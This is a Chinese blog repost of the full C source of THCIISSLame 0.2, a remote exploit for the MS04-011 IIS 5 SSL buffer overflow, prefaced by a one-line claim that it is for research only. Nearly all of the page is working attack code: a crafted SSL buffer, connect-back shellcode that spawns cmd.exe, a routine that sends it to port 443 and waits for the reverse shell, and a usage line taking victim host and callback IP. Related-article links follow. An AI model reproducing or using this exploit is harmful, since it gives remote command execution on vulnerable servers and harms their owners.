MS04011远程缓冲区溢出代码

zoukankan html css js c++ java

MS04011远程缓冲区溢出代码

应网友要求，公布04-011攻击脚本。现在公布，应该不会有太多实际意义了吧，仅供研究使用。 ---------------------------------------------------------------------------------- /*************************************************************/ /* THCIISSLame 0.2 - IIS 5 SSL remote root exploit */ /* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org) */ /* THC PUBLIC SOURCE MATERIALS */ /* */ /* Bug was found by Internet Security Systems */ /* Reversing credits of the bug go to Halvar Flake */ /* */ /* compile with MS Visual C++ : cl THCIISSLame.c */ /* */ /* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak, */ /* scut, stealth, FtR and Random */ /*************************************************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <winsock2.h> #pragma comment(lib, "ws2_32.lib") #define jumper "\xeb\x0f" #define greetings_to_microsoft "\x54\x48\x43\x4f\x57\x4e\x5a\x49\x49\x53\x21" char sslshit[] = "\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00"; char shellcode[] = "\xeb\x25\x7a\x69\x7f\x00\x00\x01\x02\x06\x6c\x59\x6c\x59\xf8" "\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f" "\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d" "\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c" "\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01" "\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b" "\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe" "\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x09\x8d\x44" "\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50" "\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f" "\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\xbe\xfe\x4d\x08" "\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\x89\xc7\x6a\x02" "\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x89\xce\x31\xdb\x53" "\x53\x53\x53\x56\x46\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30" "\x6a\x10\x55\x57\xff\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55" "\x55\xff\x55\xec\x8d\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65" "\x68\x5c\x63\x6d\x64\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57" "\x53\x53\xfe\xca\x01\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88" "\x50\xb1\x08\x53\x53\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff" "\x55\xf0\x6a\xff\xff\x55\xe4"; void usage(); void shell(int sock); int main(int argc, char *argv[]) { unsigned int i,sock,sock2,sock3,addr,rc,len=16; unsigned char *badbuf,*p; unsigned long offset = 0x6741a1cd; unsigned long XOR = 0xffffffff; unsigned short cbport; unsigned long cbip; struct sockaddr_in mytcp; struct hostent * hp; WSADATA wsaData; printf("\nTHCIISSLame v0.2 - IIS 5.0 SSL remote root exploit\n"); printf("tested on Windows 2000 Server german/english SP4\n"); printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n"); if(argc<4 || argc>4) usage(); badbuf = malloc(327); memset(badbuf,0,327); printf("\n[*] building buffer\n"); p = badbuf; memcpy(p,sslshit,sizeof(sslshit)); p+=sizeof(sslshit)-1; strcat(p,jumper); strcat(p,greetings_to_microsoft); offset^=XOR; strncat(p,(unsigned char *)&offset,4); cbport = htons((unsigned short)atoi(argv[3])); cbip = inet_addr(argv[2]); memcpy(&shellcode[2],&cbport,2); memcpy(&shellcode[4],&cbip,4); strcat(p,shellcode); if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0) { printf("WSAStartup failed !\n"); exit(-1); } hp = gethostbyname(argv[1]); if (!hp){ addr = inet_addr(argv[1]); } if ((!hp) && (addr == INADDR_NONE) ) { printf("Unable to resolve %s\n",argv[1]); exit(-1); } sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if (!sock) { printf("socket() error...\n"); exit(-1); } if (hp != NULL) memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length); else mytcp.sin_addr.s_addr = addr; if (hp) mytcp.sin_family = hp->h_addrtype; else mytcp.sin_family = AF_INET; mytcp.sin_port=htons(443); printf("[*] connecting the target\n"); rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in)); if(rc==0) { send(sock,badbuf,326,0); printf("[*] exploit send\n"); Sleep(500); mytcp.sin_addr.s_addr = 0; mytcp.sin_port=htons((unsigned short)atoi(argv[3])); sock2=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); rc=bind(sock2,(struct sockaddr *)&mytcp,16); if(rc!=0) { printf("bind error() %d\n",WSAGetLastError()); exit(-1); } rc=listen(sock2,1); if(rc!=0) { printf("listen error()\n"); exit(-1); } printf("[*] waiting for shell\n"); sock3 = accept(sock2, (struct sockaddr*)&mytcp,&len); if(sock3) { printf("[*] Exploit successful ! Have fun !\n"); printf("[*] --------------------------------------------------------------------\n\n"); shell(sock3); } } else { printf("\nCan't connect to ssl port 443!\n"); exit(-1); } shutdown(sock,1); closesocket(sock); shutdown(sock,2); closesocket(sock2); shutdown(sock,3); closesocket(sock3); free(badbuf); exit(0); } void usage() { unsigned int a; printf("\nUsage: <victim-host> <connectback-ip> <connectback port>\n"); printf("Sample: THCIISSLame www.lameiss.com 31.33.7.23 31337\n\n"); exit(0); } void shell(int sock) { int l; char buf[1024]; struct timeval time; unsigned long ul[2]; time.tv_sec = 1; time.tv_usec = 0; while (1) { ul[0] = 1; ul[1] = sock; l = select (0, (fd_set *)&ul, NULL, NULL, &time); if(l == 1) { l = recv (sock, buf, sizeof (buf), 0); if (l <= 0) { printf ("bye bye...\n"); return; } l = write (1, buf, l); if (l <= 0) { printf ("bye bye...\n"); return; } } else { l = read (0, buf, sizeof (buf)); if (l <= 0) { printf("bye bye...\n"); return; } l = send(sock, buf, l, 0); if (l <= 0) { printf("bye bye...\n"); return; } } } }

查看全文

相关阅读:
龙井和碧螺春的功效与作用
 064 01 Android 零基础入门 01 Java基础语法 08 Java方法 02 无参带返回值方法
 063 01 Android 零基础入门 01 Java基础语法 08 Java方法 01 无参无返回值方法
 062 01 Android 零基础入门 01 Java基础语法 07 Java二维数组 01 二维数组应用
 061 01 Android 零基础入门 01 Java基础语法 06 Java一维数组 08 一维数组总结
 060 01 Android 零基础入门 01 Java基础语法 06 Java一维数组 07 冒泡排序
 059 01 Android 零基础入门 01 Java基础语法 06 Java一维数组 06 增强型for循环
 058 01 Android 零基础入门 01 Java基础语法 06 Java一维数组 05 案例：求数组元素的最大值
 057 01 Android 零基础入门 01 Java基础语法 06 Java一维数组 04 案例：求整型数组的数组元素的元素值累加和
 056 01 Android 零基础入门 01 Java基础语法 06 Java一维数组 03 一维数组的应用

原文地址：https://www.cnblogs.com/adodo1/p/4327793.html